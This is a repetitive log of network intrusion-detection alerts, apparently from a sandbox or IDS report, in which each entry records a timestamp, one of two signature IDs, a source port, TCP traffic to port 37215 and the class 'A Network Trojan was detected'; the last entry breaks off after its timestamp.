          Timestamp:06/09/24-16:33:40.818742
          SID:2829579
          Source Port:43704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.166500
          SID:2829579
          Source Port:51172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.565068
          SID:2829579
          Source Port:43540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.160133
          SID:2829579
          Source Port:35354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.823266
          SID:2829579
          Source Port:47656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.291323
          SID:2835222
          Source Port:59654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.164816
          SID:2835222
          Source Port:44056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.129935
          SID:2829579
          Source Port:48806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.080974
          SID:2835222
          Source Port:36094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.477439
          SID:2829579
          Source Port:58328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.037112
          SID:2829579
          Source Port:58920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.245521
          SID:2829579
          Source Port:34634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721206
          SID:2835222
          Source Port:41314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.468013
          SID:2829579
          Source Port:37218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.163441
          SID:2835222
          Source Port:46764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.008268
          SID:2829579
          Source Port:53828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.694124
          SID:2829579
          Source Port:52254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.290342
          SID:2829579
          Source Port:58816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.565933
          SID:2829579
          Source Port:40446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818765
          SID:2835222
          Source Port:55844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.417688
          SID:2835222
          Source Port:59844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.987883
          SID:2835222
          Source Port:37234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.289130
          SID:2829579
          Source Port:37316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.291332
          SID:2835222
          Source Port:35068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644669
          SID:2835222
          Source Port:32952
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.163770
          SID:2829579
          Source Port:47426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.692154
          SID:2835222
          Source Port:43676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:46.418273
          SID:2835222
          Source Port:44238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.916935
          SID:2829579
          Source Port:43442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.295362
          SID:2829579
          Source Port:54586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928500
          SID:2829579
          Source Port:41182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.244718
          SID:2829579
          Source Port:59940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.995793
          SID:2835222
          Source Port:54352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.894368
          SID:2829579
          Source Port:33674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.597252
          SID:2829579
          Source Port:51908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398529
          SID:2835222
          Source Port:33430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.288195
          SID:2829579
          Source Port:50498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.917150
          SID:2829579
          Source Port:36782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718431
          SID:2835222
          Source Port:51890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.226483
          SID:2829579
          Source Port:38416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.225356
          SID:2829579
          Source Port:36978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.466199
          SID:2835222
          Source Port:44570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.245417
          SID:2835222
          Source Port:59780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.224944
          SID:2835222
          Source Port:57554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644342
          SID:2829579
          Source Port:55308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168826
          SID:2835222
          Source Port:33852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928821
          SID:2829579
          Source Port:45476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.413962
          SID:2829579
          Source Port:52980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.208182
          SID:2829579
          Source Port:45302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397216
          SID:2835222
          Source Port:47612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.164602
          SID:2829579
          Source Port:52622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038236
          SID:2829579
          Source Port:59634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397621
          SID:2829579
          Source Port:46374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.241850
          SID:2835222
          Source Port:42770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929366
          SID:2835222
          Source Port:60122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.988254
          SID:2829579
          Source Port:35972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643602
          SID:2829579
          Source Port:55786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.715454
          SID:2829579
          Source Port:35504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.895938
          SID:2835222
          Source Port:34322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.561776
          SID:2835222
          Source Port:47396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.651336
          SID:2829579
          Source Port:45748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.043120
          SID:2835222
          Source Port:35392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397102
          SID:2835222
          Source Port:49770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.416049
          SID:2835222
          Source Port:52356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.678103
          SID:2829579
          Source Port:49150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.076451
          SID:2835222
          Source Port:52848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.242645
          SID:2835222
          Source Port:60448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.028487
          SID:2835222
          Source Port:56384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.636117
          SID:2835222
          Source Port:45702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.540077
          SID:2829579
          Source Port:47646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.085409
          SID:2835222
          Source Port:38752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205653
          SID:2829579
          Source Port:54294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.412417
          SID:2829579
          Source Port:46170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719781
          SID:2829579
          Source Port:46686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.268312
          SID:2835222
          Source Port:53734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.034250
          SID:2835222
          Source Port:53030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.651395
          SID:2829579
          Source Port:56026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538977
          SID:2829579
          Source Port:35882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.924471
          SID:2835222
          Source Port:43038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.471233
          SID:2829579
          Source Port:38964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.283693
          SID:2835222
          Source Port:53566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.598219
          SID:2835222
          Source Port:36050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.951478
          SID:2835222
          Source Port:39306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.541474
          SID:2829579
          Source Port:39156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.870632
          SID:2829579
          Source Port:60260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.283779
          SID:2829579
          Source Port:45764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.921301
          SID:2835222
          Source Port:50126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.599431
          SID:2829579
          Source Port:47314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.988214
          SID:2835222
          Source Port:58220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.558351
          SID:2835222
          Source Port:42038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818976
          SID:2829579
          Source Port:60368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.606849
          SID:2829579
          Source Port:47862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.277186
          SID:2835222
          Source Port:38616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928501
          SID:2829579
          Source Port:55272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.467010
          SID:2829579
          Source Port:33630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.167380
          SID:2829579
          Source Port:58860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.646112
          SID:2829579
          Source Port:60002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.357497
          SID:2829579
          Source Port:43484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035910
          SID:2835222
          Source Port:49298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.931626
          SID:2835222
          Source Port:59720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.823486
          SID:2829579
          Source Port:42124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.247441
          SID:2835222
          Source Port:41758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.648028
          SID:2829579
          Source Port:38320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.560594
          SID:2835222
          Source Port:54632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538145
          SID:2829579
          Source Port:56178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.102304
          SID:2829579
          Source Port:34256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.253271
          SID:2829579
          Source Port:51712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.284857
          SID:2829579
          Source Port:41596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.294106
          SID:2835222
          Source Port:55378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.074547
          SID:2835222
          Source Port:50134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946418
          SID:2829579
          Source Port:54556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.081639
          SID:2829579
          Source Port:48584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.041368
          SID:2835222
          Source Port:34794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719410
          SID:2835222
          Source Port:55002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.420129
          SID:2829579
          Source Port:45062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.598592
          SID:2835222
          Source Port:51284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.990593
          SID:2829579
          Source Port:32860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.076336
          SID:2829579
          Source Port:50420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.567698
          SID:2829579
          Source Port:50326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.028827
          SID:2829579
          Source Port:48990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.103920
          SID:2835222
          Source Port:41678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.079342
          SID:2829579
          Source Port:59558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.039163
          SID:2829579
          Source Port:47108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538958
          SID:2829579
          Source Port:33066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.988882
          SID:2829579
          Source Port:44848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.286873
          SID:2835222
          Source Port:36720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.169241
          SID:2829579
          Source Port:54690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.861901
          SID:2835222
          Source Port:42326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.300925
          SID:2829579
          Source Port:55000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718296
          SID:2835222
          Source Port:47432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.676326
          SID:2829579
          Source Port:38102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.823067
          SID:2829579
          Source Port:47900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.037733
          SID:2829579
          Source Port:44948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.948870
          SID:2835222
          Source Port:50226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822750
          SID:2829579
          Source Port:49718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.030701
          SID:2829579
          Source Port:37594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.864381
          SID:2835222
          Source Port:45740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.030663
          SID:2835222
          Source Port:59536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.682114
          SID:2829579
          Source Port:41324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418365
          SID:2835222
          Source Port:49782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.224524
          SID:2829579
          Source Port:50912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.472083
          SID:2829579
          Source Port:35944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.869010
          SID:2835222
          Source Port:39798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.246082
          SID:2835222
          Source Port:39176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718833
          SID:2835222
          Source Port:54892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.823236
          SID:2835222
          Source Port:59734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720789
          SID:2835222
          Source Port:47698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.559703
          SID:2829579
          Source Port:46134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.274642
          SID:2829579
          Source Port:57534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.284203
          SID:2835222
          Source Port:34958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.925312
          SID:2835222
          Source Port:47646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399706
          SID:2835222
          Source Port:58586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.104056
          SID:2835222
          Source Port:52330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.288656
          SID:2835222
          Source Port:38076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.890795
          SID:2829579
          Source Port:46422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.951626
          SID:2829579
          Source Port:35910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.018105
          SID:2835222
          Source Port:51070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718359
          SID:2835222
          Source Port:59730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.552880
          SID:2829579
          Source Port:43786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720505
          SID:2835222
          Source Port:45098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.412448
          SID:2829579
          Source Port:57576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.950220
          SID:2829579
          Source Port:32938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.028062
          SID:2835222
          Source Port:41386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.274767
          SID:2835222
          Source Port:49206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.288884
          SID:2835222
          Source Port:51972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.923560
          SID:2829579
          Source Port:39366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.870797
          SID:2829579
          Source Port:40516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.998808
          SID:2829579
          Source Port:33892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.925506
          SID:2835222
          Source Port:43558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.248181
          SID:2835222
          Source Port:60852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.865202
          SID:2835222
          Source Port:46910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.471763
          SID:2835222
          Source Port:52502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396211
          SID:2835222
          Source Port:41642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223443
          SID:2835222
          Source Port:52248
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.596179
          SID:2829579
          Source Port:56172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821689
          SID:2829579
          Source Port:33692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.289158
          SID:2835222
          Source Port:54622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.601095
          SID:2835222
          Source Port:40412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.601805
          SID:2835222
          Source Port:33074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.561892
          SID:2835222
          Source Port:52212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.300833
          SID:2829579
          Source Port:38836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.162665
          SID:2829579
          Source Port:44168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.167572
          SID:2835222
          Source Port:57978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.245474
          SID:2829579
          Source Port:60556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.558302
          SID:2829579
          Source Port:57836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.225538
          SID:2829579
          Source Port:38818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.249414
          SID:2835222
          Source Port:52440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.078981
          SID:2829579
          Source Port:59318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.464751
          SID:2829579
          Source Port:60422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.592770
          SID:2835222
          Source Port:45630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.986737
          SID:2829579
          Source Port:49534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.088349
          SID:2829579
          Source Port:54790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.869348
          SID:2835222
          Source Port:48120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.713858
          SID:2829579
          Source Port:35580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.819000
          SID:2829579
          Source Port:45198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.994371
          SID:2835222
          Source Port:59488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.414732
          SID:2835222
          Source Port:33784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.646934
